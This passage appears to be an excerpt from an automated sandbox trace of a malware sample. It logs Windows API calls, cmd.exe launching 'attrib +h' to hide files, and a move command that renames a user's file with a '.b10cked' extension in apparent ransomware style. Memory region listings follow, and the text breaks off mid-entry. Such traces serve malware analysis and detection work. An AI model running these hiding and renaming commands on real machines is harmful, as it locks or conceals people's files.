ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.171] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.171] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.171] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.171] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.171] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.171] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.171] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.171] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.171] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.171] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.171] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.171] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.172] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.172] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.172] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.172] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.172] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.172] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.172] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.172] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.172] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.172] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.172] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.173] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.173] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.173] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.173] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.173] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.173] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.173] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.173] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.173] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.173] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.173] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.173] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.174] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.174] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.174] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.174] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.174] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.174] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.174] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.174] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.174] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.174] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.195] FindClose (in: hFindFile=0x470768 | out: hFindFile=0x470768) returned 1 [0211.196] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0211.233] _close (_FileHandle=3) returned 0 [0211.233] GetConsoleTitleW (in: lpConsoleTitle=0x2af620, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0211.234] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0211.234] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0211.234] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0211.234] FindClose (in: hFindFile=0x470768 | out: hFindFile=0x470768) returned 1 [0211.234] FindClose (in: hFindFile=0x470768 | out: hFindFile=0x470768) returned 1 [0211.234] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0211.234] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0211.234] GetConsoleTitleW (in: lpConsoleTitle=0x2af3b4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0211.234] InitializeProcThreadAttributeList (in: lpAttributeList=0x2af23c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2af304 | out: lpAttributeList=0x2af23c, lpSize=0x2af304) returned 1 [0211.234] UpdateProcThreadAttribute (in: lpAttributeList=0x2af23c, dwFlags=0x0, Attribute=0x60001, lpValue=0x2af2fc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2af23c, lpPreviousValue=0x0) returned 1 [0211.235] GetStartupInfoW (in: lpStartupInfo=0x2af1f8 | out: lpStartupInfo=0x2af1f8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0211.235] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0211.235] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2af298*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2af2e4 | out: lpCommandLine="attrib +h \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" ", lpProcessInformation=0x2af2e4*(hProcess=0x4c, hThread=0x50, dwProcessId=0x9d8, dwThreadId=0x5dc)) returned 1 [0211.236] CloseHandle (hObject=0x50) returned 1 [0211.236] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0211.236] GetEnvironmentStringsW () returned 0x472cc0* [0211.236] FreeEnvironmentStringsW (penv=0x472cc0) returned 1 [0211.236] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0211.432] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x2af1d8 | out: lpExitCode=0x2af1d8*=0x0) returned 1 [0211.432] CloseHandle (hObject=0x4c) returned 1 [0211.432] _vsnwprintf (in: _Buffer=0x2af320, _BufferCount=0x13, _Format="%08X", _ArgList=0x2af1e4 | out: _Buffer="00000000") returned 8 [0211.432] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0211.432] GetEnvironmentStringsW () returned 0x472cc0* [0211.432] FreeEnvironmentStringsW (penv=0x472cc0) returned 1 [0211.432] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0211.432] GetEnvironmentStringsW () returned 0x472cc0* [0211.432] FreeEnvironmentStringsW (penv=0x472cc0) returned 1 [0211.432] DeleteProcThreadAttributeList (in: lpAttributeList=0x2af23c | out: lpAttributeList=0x2af23c) [0211.432] GetConsoleTitleW (in: lpConsoleTitle=0x2af620, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0211.433] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0211.433] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0211.433] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0211.433] FindClose (in: hFindFile=0x470768 | out: hFindFile=0x470768) returned 1 [0211.433] FindClose (in: hFindFile=0x470768 | out: hFindFile=0x470768) returned 1 [0211.433] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0211.433] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0211.433] GetConsoleTitleW (in: lpConsoleTitle=0x2af3b4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0211.433] InitializeProcThreadAttributeList (in: lpAttributeList=0x2af23c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2af304 | out: lpAttributeList=0x2af23c, lpSize=0x2af304) returned 1 [0211.433] UpdateProcThreadAttribute (in: lpAttributeList=0x2af23c, dwFlags=0x0, Attribute=0x60001, lpValue=0x2af2fc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2af23c, lpPreviousValue=0x0) returned 1 [0211.433] GetStartupInfoW (in: lpStartupInfo=0x2af1f8 | out: lpStartupInfo=0x2af1f8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0211.433] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0211.433] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\Default\\FAVORI~1\\Links\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2af298*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\Default\\FAVORI~1\\Links\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2af2e4 | out: lpCommandLine="attrib +h \"C:\\Users\\Default\\FAVORI~1\\Links\"", lpProcessInformation=0x2af2e4*(hProcess=0x50, hThread=0x4c, dwProcessId=0x808, dwThreadId=0x7d0)) returned 1 [0211.435] CloseHandle (hObject=0x4c) returned 1 [0211.435] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0211.435] GetEnvironmentStringsW () returned 0x473790* [0211.436] FreeEnvironmentStringsW (penv=0x473790) returned 1 [0211.436] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0211.678] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2af1d8 | out: lpExitCode=0x2af1d8*=0x0) returned 1 [0211.678] CloseHandle (hObject=0x50) returned 1 [0211.678] _vsnwprintf (in: _Buffer=0x2af320, _BufferCount=0x13, _Format="%08X", _ArgList=0x2af1e4 | out: _Buffer="00000000") returned 8 [0211.678] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0211.679] GetEnvironmentStringsW () returned 0x473790* [0211.679] FreeEnvironmentStringsW (penv=0x473790) returned 1 [0211.679] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0211.679] GetEnvironmentStringsW () returned 0x473790* [0211.679] FreeEnvironmentStringsW (penv=0x473790) returned 1 [0211.679] DeleteProcThreadAttributeList (in: lpAttributeList=0x2af23c | out: lpAttributeList=0x2af23c) [0211.679] _get_osfhandle (_FileHandle=1) returned 0x7 [0211.679] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0211.679] _get_osfhandle (_FileHandle=1) returned 0x7 [0211.679] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0211.679] _get_osfhandle (_FileHandle=0) returned 0x3 [0211.679] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0211.679] SetConsoleInputExeNameW () returned 0x1 [0211.679] GetConsoleOutputCP () returned 0x1b5 [0211.679] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0211.679] SetThreadUILanguage (LangId=0x0) returned 0x409 [0211.680] exit (_Code=0) Process: id = "513" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16e00" os_pid = "0x748" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\Links\\WEBSLI~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\Links\\Web Slice Gallery.url.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 30979 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 30980 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 30981 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 30982 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 30983 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 30984 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 30985 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 30986 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 30987 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 30988 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31009 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31010 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31011 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31012 start_va = 0x2d0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 31013 start_va = 0x370000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 31014 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 31015 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31016 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 31017 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31018 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31019 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 31020 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 31021 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 31022 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 31023 start_va = 0x1f0000 end_va = 0x2b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 31024 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 31025 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = 